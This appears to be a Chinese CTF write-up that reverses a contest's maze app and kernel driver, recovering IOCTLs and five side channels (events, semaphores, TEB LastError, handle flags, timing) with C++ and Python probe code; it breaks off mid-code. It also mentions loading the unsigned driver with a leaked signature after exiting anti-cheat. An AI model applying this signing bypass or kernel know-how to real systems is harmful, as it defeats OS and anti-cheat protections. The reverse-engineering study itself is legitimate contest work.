从上述文本能够判断是迷宫题目，但是应该不是简单的迷宫，应该无法通过传统的迷宫分析方法分析，需要完整的逆向，至少要找到文档中提到的：

# 某些异常现象暗示着隐藏的信息泄露。找到这些线索，你就能感知每一步的结果；发现得越多，破解效率越高。

二、应用层：ShadowGateApp.exe

并未发现有保护壳，直接运行得到：

C:\Users\Euarno\Desktop\2026游戏安全技术竞赛-PC客户端安全-初赛>ShadowGateApp.exe
==============================================
    Shadow Palace Gate  -  ACCESS DENIED
==============================================
  ACE has intercepted Shadow's palace gate
  system. A kernel driver hides an encrypted
  maze inside. Navigate through it to extract
  the credential for Shadow's internal network.
  The palace gives NO feedback on whether
  your moves succeed or hit a wall.
Or does it? The system is not as silent
as it seems. Five hidden flaws betray
  the result of every move 鈥?but each move
  exposes only one of them.
  Hint: after each reset, the first five
  successful moves reveal each flaw exactly
  once, in a fixed order.
[*] Connecting to Shadow gate driver...
[+] Gate module online.
[*] Maze grid: 13x13, Entry=(0,0), Exit=(12,12)
Commands:
  W/A/S/D    - Navigate Up/Left/Down/Right
  I/J/K/L    - Navigate Up/Left/Down/Right (alt)
  R          - Reset to entry point
  T          -Show operation log (position hidden)
  H          -Show this help
  Q / ESC    - Abort mission

可以有一个基本的了解13*13的迷宫，“The palace gives NO feedback on whether your moves succeed or hit a wall.”表面不会有反馈，“Five hidden flaws betray the result of every move ”要通过五个侧信道得到迷宫的反馈，**“after each reset, the first five successful moves reveal each flaw exactly once, in a fixed order. ”**每次你按R重置后，前5次成功移动会依次触发五种不同的泄露机制，顺序是固定的。(这里其实还是有一点疑惑的，最终只找到了三类泄露方式，但也可以算作五个泄漏点)

字符串没有做混淆，在字符串表暴露了很多信息。结合字符串的交叉引用，有如下分析：

__int64 OpenShadowGateDevice()
{
  __int64 result; // rax
DWORDLastError; // edi
//设备路径
  result = (__int64)CreateFileW(L"\\\\.\\ShadowGate", 0xC0000000, 0, 0, 3u, 0x80u, 0);
if ( result ==-1 )
  {
LastError=GetLastError();
    sub_140001010("[ERROR] Failed to open device '%ws'\n", L"\\\\.\\ShadowGate");
    sub_140001010("[ERROR] Error code: %lu (0x%08lX)\n", LastError, LastError);
if ( LastError==2 )
    {
//要求我们应该提前加载好驱动 驱动没有签名 我的解决方案是找一个泄露签名 退出ACE预启动 即可加载
      sub_140001010("[HINT] Driver not loaded. Use: sc create ShadowGate type=kernel binPath=\\ShadowGateSys.sys\n");
      sub_140001010("[HINT] Then: sc start ShadowGate\n");
return -1;
    }
else
    {
if ( LastError==5 )
        sub_140001010("[HINT] Run as Administrator.\n");
return -1;
    }
  }
return result;
}

虽然还没有分析驱动，但是应用创建了两个全局命名事件，名称强烈暗示它们分别对应移动成功和撞墙，即失败。

HANDLE CreateLeakEvents()
{
  HANDLE result; // rax
  hObject = CreateEventW(0, 1, 0, L"Global\\MazeMoveOK");
result = CreateEventW(0, 1, 0, L"Global\\MazeMoveWall");
  qword_140005688 = result;
return result;
}

通信方面使用了最基本的IO通讯，分析DeviceIoControl的交叉引用可以得到所有的IO码。

if ( QueryMaza(v6, &v9) )
printf(
"[*] Maze grid: %ux%u, Entry=(%u,%u), Exit=(%u,%u)\n",
        (_DWORD)v9,
        DWORD1(v9),
        DWORD2(v9),
        HIDWORD(v9),
        v10,
        HIDWORD(v10));
BOOL __fastcall QueryMaza(__int64 a1, void *lpOutBuffer)
{
  DWORD BytesReturned; // [rsp+40h] [rbp-18h] BYREF
  BytesReturned = 0;
return DeviceIoControl(hDevice, 0x8001200C, 0, 0, lpOutBuffer, 0x18u, &BytesReturned, 0);
}

显然0x8001200C用于查询迷宫信息，接下来就能发现main函数有大量的花指令了，因为正常的R等逻辑的处理代码都不存在。

只需要把：

push rcx
ret

改为：

jmp rcx

伪代码就重建好了，然后依旧是出题人的小礼物啊：

v8 -= 27;
switch ( v8 )

这里会有垂落，处理的是大小写R的情况：

case '7':
case 'W':
ResetMaze(_RCX);
     v6 = 0;
     dword_140005668 = 0;
     v22[0] = 0;
     v7 = 0;
printf("[*] Reset to entry point.\n");
continue;
BOOL ResetMaze(){
  DWORD BytesReturned; // [rsp+40h] [rbp-18h] BYREF
  BytesReturned = 0;
return DeviceIoControl(hDevice, 0x80012008, 0, 0, 0, 0, &BytesReturned, 0);
}

显然0x80012008用于重新开始，那剩下的操作码肯定是操作迷宫了的。

IOCTL	作用
0x80012004	移动/核心交互
0x80012008	重置到起点
0x8001200C	查询迷宫信息

紧接着还要详细分析，相关的按键被映射为了十六进制整数，如下：

case '&':
case '/':
case 'F':
case 'O':
        LOBYTE(direct) = 0x30; //A  J
        v12 = 76;
goto LABEL_11;
case ')':
case '1':
case 'I':
case 'Q':
        LOBYTE(direct) = 0x40;// D  L
        __asm { rcl     al, cl }
        v12 = 82;
goto LABEL_11;
case '.':
case '<':
case 'N':
case '\\':
        LOBYTE(direct) = 0x10; //W  I 
        v12 = 85;
goto LABEL_11;
case '0':
case '8':
case 'P':
case 'X':
        LOBYTE(direct) = 0x20; // S   K 
        v12 = 68;
LABEL_11:
if ( v6 < 255 )
        {
          v22[v7] = v12;
          ++v6;
          ++v7;
if ( (unsignedint)v6 >= 0x100 )
            sub_140001E88(_RCX, direct);
          v22[v7] = 0;
        }
        v14 = (unsignedint)dword_140005668;
        memset(v21, 0, sizeof(v21));
        v18 = 0;
        ++dword_140005668;
        v15 = TryMove(hDevice, direct, v14, v21, &v18);

TryMove对于路径的打包如下：

__int64 v16;
unsignedint v17;
v16 = (unsigned __int8)v9; //只用了第一字节？
v17 = a3 ^ v9 ^ 0xDEAD1337;
DeviceIoControl(a1, 0x80012004, &v16, 0xCu, v14, 0x84u, &v15, 0) //12字节大小数据包 从v16开始写入

其中，具体的加密逻辑是这样：

__int64 __fastcall TryMove(void *a1, __int64 _RDX, int op_count, _BYTE *a4, _DWORD *a5){
//rdx是代表方向的十六进制整数 op_count是一个计数器，代表次数
    v6 = _RDX ^ 0xFA;
    v9 = (unsigned __int8)(_RDX | (8 * v6));
    v16 = (unsigned __int8)v9; //结构体开始
    v17 = op_count ^ v9 ^ 0xDEAD1337
if ( DeviceIoControl(a1, 0x80012004, &v16, 0xCu, v14, 0x84u, &v15, 0) )
        ...
}

足够我们重建结构体了，但是伪代码有一个问题，驱动如何校验v17的正确性呢？切换到汇编，根据DeviceIoControl的参数可以知道。

lea     r8, [r11-30h]   ; lpInBuffer

然后看汇编层面是如何写入[r11-30h]的：

mov     [r11-30h], al
mov     [r11-2Ch], r8d
mov     [r11-28h], eax

统一成buf的偏移就是：

[buf+0] 写入 1 字节
[buf+4] 写入 4 字节
[buf+8] 写入 4 字节
struct {
uint8_t  field0;
uint8_t  pad[3];
uint32_t field4;
uint32_t field8;
};

也就能重建结构体为：

typedef struct _MOVE_REQ {
uint8_t  encoded_dir; //映射为了十六进制整数
uint8_t  pad[3];      //数据对齐
uint32_t op_count;    //操作次数
uint32_t checksum;    //校验点
 } MOVE_REQ; //一共12字节

接下来是输入T的问题：

case '9':
case 'Y':
sub_140001010(asc_1400038E0, (unsignedint)v6);
      v17 = v22;
if ( v6 <= 0 )
        v17 = "(none)";
sub_140001010(asc_140003908, v17);
continue;

命令 T的作用并不是显示当前位置，而是输出应用层维护的成功移动日志。主循环中，每当一次移动被认为成功时，程序都会将对应方向字符L R U D追加到缓冲区 v22 中,而 T/t分支则负责打印当前操作计数及该字符串,也就是这里只能打印成功的路径。

先玩一下，也就是可以借助前五个正确路径找到五个泄漏点，因为提到了前五次成功顺次泄露，会在后边起关键作用。

- D D D D D T
程序输出：
- Sequence: RRRRR

三、驱动层：ShadowGateSys.sys

也是见到没有壳子轻松达到4 MB的驱动文件了，混淆或者花指令估计是跑不了了，先迎接出题人的小礼物，重建sub_140003208：

0x140003244  call sub_1400018A0

patch为：

mov eax, 0

伪代码重建成功：

__int64 __fastcall sub_140003208(struct _DRIVER_OBJECT *a1){
  NTSTATUS v3; // eax
  NTSTATUS v4; // edi
struct _UNICODE_STRING DestinationString; // [rsp+40h] [rbp-18h] BYREF
  P = (PVOID)ExAllocatePool2(64, 472, 1702519117);
if ( !P )
return 3221225626LL;
KeInitializeSpinLock(&SpinLock);
KeInitializeSpinLock(&qword_1400050D0);
  ((void (*)(void))loc_140001E60)();
  DestinationString = 0;
RtlInitUnicodeString(&DestinationString, L"\\Device\\ShadowGate");
  v3 = IoCreateDevice(a1, 0, &DestinationString, 0x22u, 0x100u, 0, &DeviceObject);
  v4 = v3;
if ( v3 < 0 )
  {
    _mm_lfence();
ExFreePoolWithTag(P, 0x657A614Du);
LABEL_5:
    P = 0;
return (unsignedint)v4;
  }
RtlInitUnicodeString(&SymbolicLinkName, L"\\??\\ShadowGate");
  v4 = IoCreateSymbolicLink(&SymbolicLinkName, &DestinationString);
if ( v4 < 0 )
  {
    _mm_lfence();
IoDeleteDevice(DeviceObject);
ExFreePoolWithTag(P, 0x657A614Du);
    DeviceObject = 0;
goto LABEL_5;
  }
  a1->DriverUnload = (PDRIVER_UNLOAD)sub_140001840;
  a1->MajorFunction[0] = (PDRIVER_DISPATCH)sub_1400014B0;
  a1->MajorFunction[2] = (PDRIVER_DISPATCH)sub_140001410;
  a1->MajorFunction[14] = (PDRIVER_DISPATCH)sub_140001540;
  DeviceObject->Flags |= 4u;
  DeviceObject->Flags &= ~0x80u;
return 0;
}

接下来寻5个泄漏点，刚才在应用层找到的事件，先看字符串定位过去，找到第一个泄漏点。

① 事件泄露

int __fastcall sub_1400022B0(__int64 a1, int a2){
int result; // eax
const WCHAR *v4; // rdx
struct _UNICODE_STRING DestinationString; // [rsp+20h] [rbp-40h] BYREF
struct _OBJECT_ATTRIBUTES ObjectAttributes; // [rsp+30h] [rbp-30h] BYREF
void *EventHandle; // [rsp+80h] [rbp+20h] BYREF
  result = (unsigned __int8)dword_140005000;
if ( (((_BYTE)dword_140005000 * ((_BYTE)dword_140005000 - 1)) & 1) == 0 )
  {
if ( !a2 || (v4 = L"\\BaseNamedObjects\\MazeMoveWall", a2 == 2) )
      v4 = L"\\BaseNamedObjects\\MazeMoveOK";
RtlInitUnicodeString(&DestinationString, v4);
    ObjectAttributes.Length = 48;
    ObjectAttributes.ObjectName = &DestinationString;
    ObjectAttributes.RootDirectory = 0;
    ObjectAttributes.Attributes = 576;
    EventHandle = 0;
    *(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0;
    result = ZwOpenEvent(&EventHandle, 2u, &ObjectAttributes);
if ( result >= 0 )
    {
ZwSetEvent(EventHandle, 0);
return ZwClose(EventHandle);
    }
  }
return result;
}

该函数根据传入状态参数，选择 **\BaseNamedObjects\MazeMoveOK **或\BaseNamedObjects\MazeMoveWall

随后通过ZwOpenEvent打开对应命名事件，并调用ZwSetEvent将其置位，最后关闭句柄。

由于应用层事先创建了同名全局事件Global\MazeMoveOK与Global\MazeMoveWall

因此用户态可在每次发送移动请求后轮询这两个事件，从而判断本次移动是成功推进还是撞墙失败。

② GUID泄露

然后在导入表发现了函数KeReleaseSemaphore和ObReferenceObjectByName跟到，sub_140319A37，有明显的选择和解密流程。

if ( !v5 || (v9 = &unk_1400041E0, v5 == 2) )
        v9 = &unk_140004160;
      v10 = 57;
      v11 = v9 - (_BYTE *)v18;
      v12 = v18;
do
      {
        *v12 = *(WCHAR *)((char *)v12 + v11) ^ 0x4B; //解密
        ++v12;
        --v10;
      }
while ( v10 );
    }
RtlInitUnicodeString((PUNICODE_STRING)v17, v18); //构建字符串
ObReferenceObjectByName(v17, 64, 0);

就要看看unk_1400041E0和unk_140004160对应的到底是什么字符串了。

def decode_guid_name(words):
    return ''.join(chr(w ^ 0x4B) for w in words)
unk_140004160 = [0x0017, 0x0009, 0x002A, 0x0038, 0x002E, 0x0005, 0x002A, 0x0026, 0x002E, 0x002F, 0x0004, 0x0029, 0x0021, 0x002E, 0x0028, 0x003F, 0x0038, 0x0017, 0x0030, 0x000A, 0x007C, 0x000D, 0x0078, 0x0009, 0x0079, 0x0008, 0x007A, 0x0066, 0x0072, 0x000E, 0x007F, 0x000F, 0x0066, 0x007F, 0x0008, 0x0073, 0x000A, 0x0066, 0x0009, 0x007E, 0x000F, 0x007D, 0x0066, 0x007A, 0x000D, 0x0079, 0x000E, 0x0078, 0x000A, 0x007F, 0x0009, 0x007E, 0x0008, 0x007D, 0x000F, 0x0036, 0x004B, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000]
unk_1400041E0 = [0x0017, 0x0009, 0x002A, 0x0038, 0x002E, 0x0005, 0x002A, 0x0026, 0x002E, 0x002F, 0x0004, 0x0029, 0x0021, 0x002E, 0x0028, 0x003F, 0x0038, 0x0017, 0x0030, 0x0009, 0x0073, 0x000E, 0x0079, 0x0008, 0x0078, 0x000F, 0x007B, 0x0066, 0x007B, 0x000D, 0x007E, 0x000A, 0x0066, 0x007E, 0x000F, 0x0072, 0x0009, 0x0066, 0x0008, 0x007D, 0x000E, 0x007C, 0x0066, 0x0079, 0x000A, 0x0078, 0x000D, 0x007F, 0x0009, 0x007E, 0x0008, 0x007D, 0x000F, 0x007C, 0x000E, 0x0036, 0x004B, 0x0000, 0x0000, 0x0000, 0x000E, 0x0033, 0x0018, 0x002E]
print(decode_guid_name(unk_140004160))
print(decode_guid_name(unk_1400041E0))

得到输出，也就找到了第二个泄漏点：

\BaseNamedObjects\{A7F3B2C1-9E4D-4C8A-B5D6-1F2E3A4B5C6D}KKKKKKK
\BaseNamedObjects\{B8E2C3D0-0F5A-5D9B-C6E7-2A3F4B5C6D7E}KKKExSe
//手动去尾巴ing
\BaseNamedObjects\{A7F3B2C1-9E4D-4C8A-B5D6-1F2E3A4B5C6D}
\BaseNamedObjects\{B8E2C3D0-0F5A-5D9B-C6E7-2A3F4B5C6D7E}

但是暂时不能确定哪个是撞墙，哪个是成功，要具体测试一下。

#include 
#include 
#include 
#include 
#include 
staticconstwchar_t* DEVICE_NAME = L"\\\\.\\ShadowGate";
staticconstwchar_t* GUID1_NAME = L"Global\\{A7F3B2C1-9E4D-4C8A-B5D6-1F2E3A4B5C6D}";
staticconstwchar_t* GUID2_NAME = L"Global\\{B8E2C3D0-0F5A-5D9B-C6E7-2A3F4B5C6D7E}";
staticconst DWORD IOCTL_MOVE = 0x80012004;
staticconst DWORD IOCTL_RESET = 0x80012008;
staticconst DWORD IOCTL_QUERY = 0x8001200C;
#pragma pack(push, 1)
struct MOVE_REQ {
uint8_t  encoded_dir;
uint8_t  pad[3];
uint32_t op_count;
uint32_t checksum;
};
#pragma pack(pop)
staticuint8_tror8(uint8_t x, int n) {
return static_cast<uint8_t>((x >> n) | (x << (8 - n)));
}
staticuint8_tencode_dir(uint8_t move_code) {
return ror8(static_cast<uint8_t>(move_code ^ 0x5A), 5);
}
staticuint8_tmove_code_from_char(char ch) {
switch (ch) {
case 'W': case 'w': return 0x10;
case 'S': case 's': return 0x20;
case 'A': case 'a': return 0x30;
case 'D': case 'd': return 0x40;
default: return 0;
    }
}
staticvoiddrain_semaphore(HANDLE hSem) {
while (WaitForSingleObject(hSem, 0) == WAIT_OBJECT_0) {
    }
}
staticboolpoll_semaphore(HANDLE hSem) {
    DWORD rc = WaitForSingleObject(hSem, 0);
return rc == WAIT_OBJECT_0;
}
staticboolreset_maze(HANDLE hDev) {
    DWORD bytesReturned = 0;
return DeviceIoControl(
        hDev,
        IOCTL_RESET,
nullptr, 0,
nullptr, 0,
        &bytesReturned,
nullptr
    ) != FALSE;
}
staticboolmove_once(HANDLE hDev, char ch, uint32_t opCount) {
uint8_t mc = move_code_from_char(ch);
if (!mc) {
        std::cerr << "invalid move char: " << ch << "\n";
return false;
    }
    MOVE_REQ req{};
    req.encoded_dir = encode_dir(mc);
    req.op_count = opCount;
    req.checksum = req.encoded_dir ^ opCount ^ 0xDEAD1337u;
uint8_t outbuf[0x84] = {};
    DWORD bytesReturned = 0;
return DeviceIoControl(
        hDev,
        IOCTL_MOVE,
        &req,
sizeof(req),
        outbuf,
sizeof(outbuf),
        &bytesReturned,
nullptr
    ) != FALSE;
}
intwmain(int argc, wchar_t* argv[]) {
    std::string path = "DDDDD";
if (argc >= 2) {
        std::wstring ws = argv[1];
        path.assign(ws.begin(), ws.end());
    }
    HANDLE hDev = CreateFileW(
        DEVICE_NAME,
        GENERIC_READ | GENERIC_WRITE,
0,
nullptr,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
nullptr
    );
if (hDev == INVALID_HANDLE_VALUE) {
        std::cerr << "CreateFileW failed, gle=0x" << std::hex << GetLastError() << "\n";
return 1;
    }
    HANDLE hGuid1 = CreateSemaphoreW(nullptr, 0, 0x7fffffff, GUID1_NAME);
    HANDLE hGuid2 = CreateSemaphoreW(nullptr, 0, 0x7fffffff, GUID2_NAME);
if (!hGuid1 || !hGuid2) {
        std::cerr << "CreateSemaphoreW failed, gle=0x" << std::hex << GetLastError() <<
"\n";
CloseHandle(hDev);
return 1;
    }
if (!reset_maze(hDev)) {
        std::cerr << "reset failed, gle=0x" << std::hex << GetLastError() << "\n";
CloseHandle(hGuid1);
CloseHandle(hGuid2);
CloseHandle(hDev);
return 1;
    }
uint32_t opCount = 0;
    std::cout << "Testing path: " << path << "\n";
for (size_t i = 0; i < path.size(); ++i) {
drain_semaphore(hGuid1);
drain_semaphore(hGuid2);
char ch = path[i];
if (!move_once(hDev, ch, opCount)) {
            std::cerr << "move " << ch << " failed at step " << i
                << ", gle=0x" << std::hex << GetLastError() << "\n";
break;
        }
bool g1 = poll_semaphore(hGuid1);
bool g2 = poll_semaphore(hGuid2);
        std::cout << "step " << (i + 1)
            << " move=" << ch
            << " opCount=" << std::dec << opCount
            << " guid1=" << (g1 ? "triggered" : "no")
            << " guid2=" << (g2 ? "triggered" : "no")
            << "\n";
        ++opCount;
    }
CloseHandle(hGuid1);
CloseHandle(hGuid2);
CloseHandle(hDev);
return 0;
}

测试DDDDD得到：

Testing path: DDDDD
step 1 move=D opCount=0 guid1=no guid2=no
step 2 move=D opCount=1 guid1=triggered guid2=no
step 3 move=D opCount=2 guid1=no guid2=no
step 4 move=D opCount=3 guid1=no guid2=no
step 5 move=D opCount=4 guid1=no guid2=no

那么路径正确时候会触发Global\{A7F3B2C1-9E4D-4C8A-B5D6-1F2E3A4B5C6D}

#Global\{A7F3B2C1-9E4D-4C8A-B5D6-1F2E3A4B5C6D} -> 成功信号量
#Global\{B8E2C3D0-0F5A-5D9B-C6E7-2A3F4B5C6D7E} -> 撞墙信号量

③ TEB LastError泄露

还是要看导入表：

  - PsGetCurrentProcessId
  - PsGetCurrentThreadId
  - PsLookupProcessByProcessId
  - PsLookupThreadByThreadId
  - KeStackAttachProcess
  - KeUnstackDetachProcess
  - PsGetProcessPeb
  - ZwQueryVirtualMemory

首先想到的可能是调试状态，或者LastError，对于LastError的话，尝试找找有没有类似的写入逻辑。

#结构：TEB -> LastErrorValue (DWORD)
#偏移：
#x86 (32 位)：TEB + 0x34
#x64 (64 位)：TEB + 0x68

int __fastcall sub_140316ADF(__int64 _RCX, int a2){
  __int16 _AX; // ax
unsigned __int64 v4; // rax
  __int64 v6; // rbx
void *v7; // rcx
  __int64 v8; // rax
int *v9; // rsi
int v10; // ebx
  __int64 v12; // [rsp-20h] [rbp-78h] BYREF
  PEPROCESS Process; // [rsp+0h] [rbp-58h] BYREF
  PVOID Object; // [rsp+8h] [rbp-50h] BYREF
struct _KAPC_STATE ApcState; // [rsp+10h] [rbp-48h] BYREF
  _AX = 0;
  __asm { rcl     ax, cl }
  v4 = (unsigned __int64)&v12 ^ _security_cookie;
  v6 = _RCX;
  v7 = *(void **)(_RCX + 464);
if ( v7 )
  {
if ( *(_QWORD *)(v6 + 456) )
    {
if ( qword_140005080 )
      {
        Object = 0;
LODWORD(v4) = PsLookupThreadByThreadId(v7, (PETHREAD *)&Object);
if ( (v4 & 0x80000000) == 0LL )
        {
          Process = 0;
if ( PsLookupProcessByProcessId(*(HANDLE *)(v6 + 456), &Process) >= 0 )
          {
KeStackAttachProcess(Process, &ApcState);
            v8 = qword_140005080(Object); //qword_140005080 是 PsGetThreadTeb v8是Teb了
if ( v8 )
            {
              v9 = (int *)(v8 + 0x68); //这里取出LastError的地址
if ( (((_BYTE)dword_140005000 * ((_BYTE)dword_140005000 - 1)) & 1) != 0 )
              {
                v10 = 0xDEADDEAD;   //1
              }
else if ( a2 )
              {
                v10 = 0xC0DE0002;   //2
if ( a2 != 2 )
                  v10 = 0xC0DE0000; //3
              }
else
              {
                v10 = 0xC0DE0001;   //4
              }
ProbeForWrite(v9, 4u, 4u);
              *v9 = v10; //这里对LaseError做了覆写
            }
KeUnstackDetachProcess(&ApcState);
ObfDereferenceObject(Process);
          }
LODWORD(v4) = ObfDereferenceObject(Object);
        }
      }
    }
  }
return v4;
}

显然可以看到：

v9 = (int *)(v8 + 0x68); //这里取出LastError的地址
*v9 = v10; //这里对LaseError做了覆写

那么LastError应该是下一个泄漏点了：

Code	含义
0xC0DE0001	ok
0xC0DE0002	到达终点？
0xC0DE0000	wall
0xDEADDEAD	干扰值

④ ZwSetInformationObject

刚才我们提到qword_140005080是PsGetThreadTeb，相关的交叉引用还有一个函数。

void sub_14031857E()
{
  __int64 v0; // rax
  _QWORD *v1; // rbx
if ( PsGetThreadTeb )
  {
if ( qword_140005090 )
    {
      v0 = _guard_dispatch_icall_fptr(); // Call PsGetThreadTeb
if ( v0 )
      {
        v1 = (_QWORD *)(v0 + 0x1748); //TEB + 0x1748
        ProbeForRead((volatile void *)(v0 + 0x1748), 8u, 8u); 
if ( *v1 ) //如果TEB + 0x1748不为0
          _guard_dispatch_icall_fptr(); // Call qword_140005090
      }
    }
  }
}

1403185EFlearbx, [rax+1748h]//rbx = TEB + 0x1748
14031861Emovrcx, rbx//ProbeForRead(TEB+0x1748, 8, 8)
140318621                 callcs:ProbeForRead
140318627                 movr10, [rbx]//读出这个位置的 8 字节值 r10 = *(QWORD*)(TEB+0x1748)
140318630                 testr10, r10//如果这个值是 0
140318638                 jzloc_140318758
1403186F6mov[rsp+38h+arg_10], 0  
140318701                 mov[rsp+38h+arg_11], r8b
14031871Dlear8, [rsp+38h+arg_10]//r8  = &2_byte_buffer
140318710                 movr9d, 2                //r9d = 2
14031872Bmovrcx, r10// rcx = *(QWORD*)(TEB+0x1748)

通过汇编可以分析出：

qword_140005090(
      *(QWORD*)(TEB + 0x1748),
4,
      &two_byte_buf,
2
  );

这还说啥了，如果不动态调试的话估计是没戏了，然后问 GPT 能不能猜测一下这是哪个函数？

为什么我把它解释成 ZwSetInformationObject
不是只凭感觉，而是因为参数形状正好匹配：
- HANDLE
- OBJECT_INFORMATION_CLASS = 4
- PVOID buffer
- ULONG length = 2
再结合动态实验：
- 把 TEB+0x1748 预置成事件句柄
- move 后这个句柄的 HANDLE_FLAG_PROTECT_FROM_CLOSE 会变化
所以这才进一步把它收敛成：
ZwSetInformationObject(handle, ObjectHandleFlagInformation, &info, 2)

查阅相关资料：

NTSYSCALLAPI
NTSTATUS
NTAPI
NtSetInformationObject(
    _In_ HANDLE Handle,
    _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass,
    _In_reads_bytes_(ObjectInformationLength) PVOID ObjectInformation,
    _In_ ULONG ObjectInformationLength  // 为2
    );
#endif
#endif
typedef struct _OBJECT_HANDLE_FLAG_INFORMATION {
      BOOLEAN Inherit;
      BOOLEAN ProtectFromClose;
  } OBJECT_HANDLE_FLAG_INFORMATION;

然后需要确定ZwSetInformationObject提供的什么信号墙，什么信号是通路？可以先创建一个事件句柄slot4_probe，把这个句柄值写到当前线程TEB + 0x1748，每次move前先调用SetHandleInformation(h, HANDLE_FLAG_PROTECT_FROM_CLOSE, 0)进行清零，在move后调用GetHandleInformation(h, &flags)，因为题目提到，reset后前五次成功步按顺序泄露。

if( flags & HANDLE_FLAG_PROTECT_FROM_CLOSE !=0)
   handle_ok =true
else
   handle_ok =False

并且稳定观测到（我们测试到了前几步都是D，并且可以通过回环 DAD 走法来增加正确步骤的次数）。

- DAD + A
  - handle_ok = True
- DAD + W
  - handle_ok = False

⑤ KeDelayExecutionThread

这个的发现要归功于提交之前的几次测试，我感觉这个寻路没有道理这么慢，内核很可能有随机的，甚至是故意的延时，发现导入了函数KeDelayExecutionThread。

void __fastcall sub_1400026B4(unsignedint *a1){
sub_140002038(a1);
sub_140002388();
JUMPOUT(0x140001FF0LL);
}
void __fastcall sub_140002038(unsignedint *a1){
  _BYTE *v1; // rdx
  __int64 v2; // r8
unsignedint v3; // eax
if ( a1 )
  {
    v1 = a1 + 1;
    v2 = 56;
//MEMORY[0xFFFFF78000000320] == KUSER_SHARED_DATA + 0x320 == TickCountLowDeprecated
    v3 = TickCountLowDeprecated ^ 0xBAADF00D; 
    *a1 = TickCountLowDeprecated ^ 0xBAADF00D; // *(DWORD*)a1 = TickCount ^ 0xBAADF00D;
// drive 用来算 delay 的那个 TickCount 同时也被编码写进了返回缓冲
do
    {
      v3 = 1103515245 * v3 + 12345;
      *v1++ = BYTE2(v3);
      --v2;
    }
while ( v2 );
  }
}
NTSTATUS sub_140002388(){
union _LARGE_INTEGER Interval; // [rsp+30h] [rbp+8h] BYREF
  Interval.QuadPart = -10000LL * (TickCountLowDeprecated % 50u + 10); //转换到毫秒 10~59ms
return KeDelayExecutionThread(0, 0, &Interval);
}

函数会通过KUSER_SHARED_DATA访问TickCountLowDeprecated，并且在异或后被编码进入返回缓冲，可以在用户层恢复被驱动使用的这个Tick值。

tick_xor = struct.unpack_from(", raw, 0)[0]
tick = tick_xor ^ 0xBAADF00D

然后计算：

predicted_ms = (tick % 50) + 10

就是理论上这个线路被延时的毫秒数，然后我们可以计算一个IO请求的耗时。

 t0 = time.perf_counter()
 DeviceIoControl(...)
 time_ms = (time.perf_counter() - t0) * 1000.0

如果predicted_ms和time_ms很接近，就能说明本次触发到了该泄漏点，但是更进一步，好像没有合适的办法确定到底是撞墙了还是成功了（从现有代码逻辑看是这样，向上的交叉引用又追不过去），其实也好办，我们能够观测到是不是触发了这个泄漏点，当观测到的时候，直接重试就好了，依赖前四个泄漏点做路线判断。

四、寻路算法并获取 Flag

算法如下：

import argparse
import collections
import ctypes
from ctypes import wintypes
import struct
import sys
import time
kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
ntdll = ctypes.WinDLL("ntdll")
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 3
FILE_ATTRIBUTE_NORMAL = 0x80
INVALID_HANDLE_VALUE = wintypes.HANDLE(-1).value
WAIT_OBJECT_0 = 0x00000000
WAIT_TIMEOUT = 0x00000102
HANDLE_FLAG_PROTECT_FROM_CLOSE = 0x00000002
IOCTL_MOVE = 0x80012004
IOCTL_RESET = 0x80012008
IOCTL_QUERY = 0x8001200C
WIN_MAGIC = 0x57494E21
LEAK_WALL = 0xC0DE0000
LEAK_OK = 0xC0DE0001
LEAK_EXIT = 0xC0DE0002
LEAK_POISON = 0xDEADDEAD
DEVICE_NAME = r"\\.\ShadowGate"
EVENT_OK_NAME = r"Global\MazeMoveOK"
EVENT_WALL_NAME = r"Global\MazeMoveWall"
SEMAPHORE_OK_GUID = "{A7F3B2C1-9E4D-4C8A-B5D6-1F2E3A4B5C6D}"
SEMAPHORE_WALL_GUID = "{B8E2C3D0-0F5A-5D9B-C6E7-2A3F4B5C6D7E}"
DIRS = {
"W": (0, -1),
"A": (-1, 0),
"S": (0, 1),
"D": (1, 0),
}
INVERSE = {"W": "S", "S": "W", "A": "D", "D": "A"}
MOVE_CODE = {"W": 0x10, "A": 0x30, "S": 0x20, "D": 0x40}
kernel32.CreateFileW.argtypes = [
    wintypes.LPCWSTR,
    wintypes.DWORD,
    wintypes.DWORD,
    wintypes.LPVOID,
    wintypes.DWORD,
    wintypes.DWORD,
    wintypes.HANDLE,
]
kernel32.CreateFileW.restype = wintypes.HANDLE
kernel32.DeviceIoControl.argtypes = [
    wintypes.HANDLE,
    wintypes.DWORD,
    wintypes.LPVOID,
    wintypes.DWORD,
    wintypes.LPVOID,
    wintypes.DWORD,
    ctypes.POINTER(wintypes.DWORD),
    wintypes.LPVOID,
]
kernel32.DeviceIoControl.restype = wintypes.BOOL
kernel32.CreateEventW.argtypes = [wintypes.LPVOID, wintypes.BOOL, wintypes.BOOL, wintypes.LPCWSTR]
kernel32.CreateEventW.restype = wintypes.HANDLE
kernel32.CreateSemaphoreW.argtypes = [
    wintypes.LPVOID,
    wintypes.LONG,
    wintypes.LONG,
    wintypes.LPCWSTR,
]
kernel32.CreateSemaphoreW.restype = wintypes.HANDLE
kernel32.WaitForSingleObject.argtypes = [wintypes.HANDLE, wintypes.DWORD]
kernel32.WaitForSingleObject.restype = wintypes.DWORD
kernel32.ResetEvent.argtypes = [wintypes.HANDLE]
kernel32.ResetEvent.restype = wintypes.BOOL
kernel32.GetCurrentThread.argtypes = []
kernel32.GetCurrentThread.restype = wintypes.HANDLE
kernel32.GetHandleInformation.argtypes = [wintypes.HANDLE, ctypes.POINTER(wintypes.DWORD)]
kernel32.GetHandleInformation.restype = wintypes.BOOL
kernel32.SetHandleInformation.argtypes = [wintypes.HANDLE, wintypes.DWORD, wintypes.DWORD]
kernel32.SetHandleInformation.restype = wintypes.BOOL
kernel32.CloseHandle.argtypes = [wintypes.HANDLE]
kernel32.CloseHandle.restype = wintypes.BOOL
kernel32.SetLastError.argtypes = [wintypes.DWORD]
kernel32.SetLastError.restype = None
class CLIENT_ID(ctypes.Structure):
    _fields_ = [("UniqueProcess", wintypes.HANDLE), ("UniqueThread", wintypes.HANDLE)]
class THREAD_BASIC_INFORMATION(ctypes.Structure):
    _fields_ = [
        ("ExitStatus", wintypes.LONG),
        ("TebBaseAddress", wintypes.LPVOID),
